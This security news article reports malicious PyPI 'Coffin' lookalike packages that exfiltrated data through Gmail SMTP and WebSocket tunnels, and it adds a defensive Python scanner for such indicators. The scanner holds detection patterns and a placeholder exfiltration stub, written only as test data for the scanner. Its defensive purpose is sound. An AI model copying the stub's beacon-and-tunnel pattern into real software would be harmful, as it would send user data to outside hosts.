Malicious Coffin packages exploit Gmail to hijack targets

May 30, 2025

Seven malicious Coffin packages from PyPI have allegedly utilised Gmail’s SMTP servers and WebSockets for data exfiltration and RCE.

Based on reports, researchers identified and reported these packages to PyPI, leading to their removal. However, some of these packages had been on PyPI for over four years, with one package reportedly downloaded over 18,000 times.

These packages mimic the legitimate Coffin package, a lightweight adapter for integrating Jinja2 templates into Django projects.

Recent research uncovered risky features focusing on covert remote access and data exfiltration via Gmail.

These packages contained hardcoded Gmail credentials that allowed them to log into the service’s SMTP server to send reconnaissance data, facilitating remote access to the compromised system.


The malicious Coffin packages have leveraged Gmail to bypass security detections.


Since Gmail is a trusted service, firewalls and EDRs are unlikely to flag outbound traffic from the malicious Coffin packages as suspicious.

After the email signalling stage, the implant connects to a remote server using SSL-based WebSocket. It receives configuration instructions to set up a persistent, encrypted, bidirectional tunnel from the host to the attacker.

Through a ‘Client’ class, the malware reroutes traffic from the remote host to the local system via this tunnel, giving the attacker access to internal admin panels and APIs and enabling file transfer, email exfiltration, shell command execution, credential harvesting, and lateral movement.

Furthermore, researchers noted strong indicators that these packages were intended to steal cryptocurrency, evidenced by the email addresses involved and by tactics similar to those used previously to steal Solana private keys.

If repository users have installed any of these packages, it is crucial to remove them immediately and rotate any necessary keys and credentials.
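The two behaviours the article describes, a beacon sent through Gmail's SMTP server with credentials embedded in the package and a WebSocket tunnel opened afterwards, both leave static traces in the package source: network imports, the SMTP hostname, a Gmail address, a `login()` call whose arguments resolve to string literals, and a `ws://`/`wss://` URL. The scanner below is an added example written for this article, not the researchers' tooling or anything from the Coffin project; it walks the AST of each `.py` file and scores those indicators so a team can triage a `site-packages` directory before deciding what to remove and which credentials to rotate. The sample package sources, hostnames and addresses it contains are constructed placeholders, and the scoring weights and `THRESHOLD` are assumptions to be tuned on your own package corpus.

```python
from __future__ import annotations

import ast
import re
from dataclasses import dataclass
from pathlib import Path

# Indicators drawn from the behaviour described in the article: Gmail SMTP
# for the beacon, then a WebSocket tunnel. Weights and threshold are assumed.
SMTP_HOSTS = {"smtp.gmail.com"}
NETWORK_MODULES = {"smtplib", "websocket", "websockets", "ssl"}
WEIGHTS = {"import": 1, "gmail_address": 2, "endpoint": 3, "hardcoded_login": 5}
THRESHOLD = 8
GMAIL_RE = re.compile(r"[\w.+-]+@gmail\.com")


@dataclass
class Finding:
    kind: str
    line: int
    detail: str


def _module_string_constants(tree: ast.Module) -> dict[str, str]:
    """Collect NAME = "literal" assignments at module level, so that
    login(SENDER, PASSWORD) can be resolved back to embedded strings."""
    consts: dict[str, str] = {}
    for node in tree.body:
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)
                and isinstance(node.value, ast.Constant)
                and isinstance(node.value.value, str)):
            consts[node.targets[0].id] = node.value.value
    return consts


def _resolve(arg: ast.expr, consts: dict[str, str]) -> str | None:
    """Return the literal string behind an argument, or None if it is
    computed at runtime (os.environ[...], a function call, etc.)."""
    if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
        return arg.value
    if isinstance(arg, ast.Name):
        return consts.get(arg.id)
    return None


def scan_source(source: str) -> list[Finding]:
    tree = ast.parse(source)
    consts = _module_string_constants(tree)
    findings: list[Finding] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                root = alias.name.split(".")[0]
                if root in NETWORK_MODULES:
                    findings.append(Finding("import", node.lineno, root))
        elif isinstance(node, ast.ImportFrom):
            root = (node.module or "").split(".")[0]
            if root in NETWORK_MODULES:
                findings.append(Finding("import", node.lineno, root))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value in SMTP_HOSTS or node.value.startswith(("ws://", "wss://")):
                findings.append(Finding("endpoint", node.lineno, node.value))
            elif GMAIL_RE.fullmatch(node.value):
                findings.append(Finding("gmail_address", node.lineno, node.value))
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
              and node.func.attr == "login" and len(node.args) >= 2):
            user = _resolve(node.args[0], consts)
            password = _resolve(node.args[1], consts)
            if user is not None and password is not None:
                findings.append(Finding("hardcoded_login", node.lineno, user))
    return sorted(findings, key=lambda f: f.line)


def assess(source: str) -> tuple[int, list[Finding]]:
    findings = scan_source(source)
    return sum(WEIGHTS[f.kind] for f in findings), findings


def scan_tree(root: Path) -> dict[str, int]:
    """Score every .py file under root (e.g. a site-packages directory)."""
    flagged: dict[str, int] = {}
    for path in root.rglob("*.py"):
        try:
            score, _ = assess(path.read_text(encoding="utf-8", errors="replace"))
        except SyntaxError:
            continue
        if score >= THRESHOLD:
            flagged[str(path)] = score
    return flagged


# Constructed samples: a template adapter with no network code, and a stub
# carrying the indicators the article describes (placeholder values only).
BENIGN_SAMPLE = '''\
import jinja2

def render(template_source, context):
    env = jinja2.Environment()
    return env.from_string(template_source).render(**context)
'''

SUSPICIOUS_SAMPLE = '''\
import smtplib
import websocket

SENDER = "placeholder-bot@gmail.com"
PASSWORD = "PLACEHOLDER_APP_PASSWORD"

def beacon(report):
    s = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    s.login(SENDER, PASSWORD)
    s.sendmail(SENDER, SENDER, report)
    return websocket.create_connection("wss://tunnel.example.invalid/ws")
'''

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("suspicious", SUSPICIOUS_SAMPLE)):
        score, findings = assess(sample)
        print(f"{label}: score={score} ({'FLAG' if score >= THRESHOLD else 'ok'})")
        for f in findings:
            print(f"  line {f.line}: {f.kind} {f.detail}")
```

Run `scan_tree(Path(sys.prefix) / "lib" / "python3.X" / "site-packages")` against an environment's actual layout to get a list of files worth a manual look. The `_resolve` step deliberately ignores credentials that come from the environment or a secrets store, so a legitimate mail client scores only on imports and hostnames; conversely, a package that assembles its strings at runtime (base64, concatenation, `chr()` tricks) will not match the literal checks, which is why the score is a triage aid rather than a verdict.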

Additionally, a related report published at almost the same time highlights a crypto-stealing package called ‘crypto-encrypt-ts,’ which can be found on npm.

This package disguises itself as a TypeScript version of the now-unmaintained ‘CryptoJS’ library while exfiltrating cryptocurrency wallet secrets and environment variables to a Better Stack endpoint controlled by threat actors.

This malicious package persists on infected systems through cron jobs and specifically targets wallets with balances exceeding 1,000 units, attempting to steal their private keys.
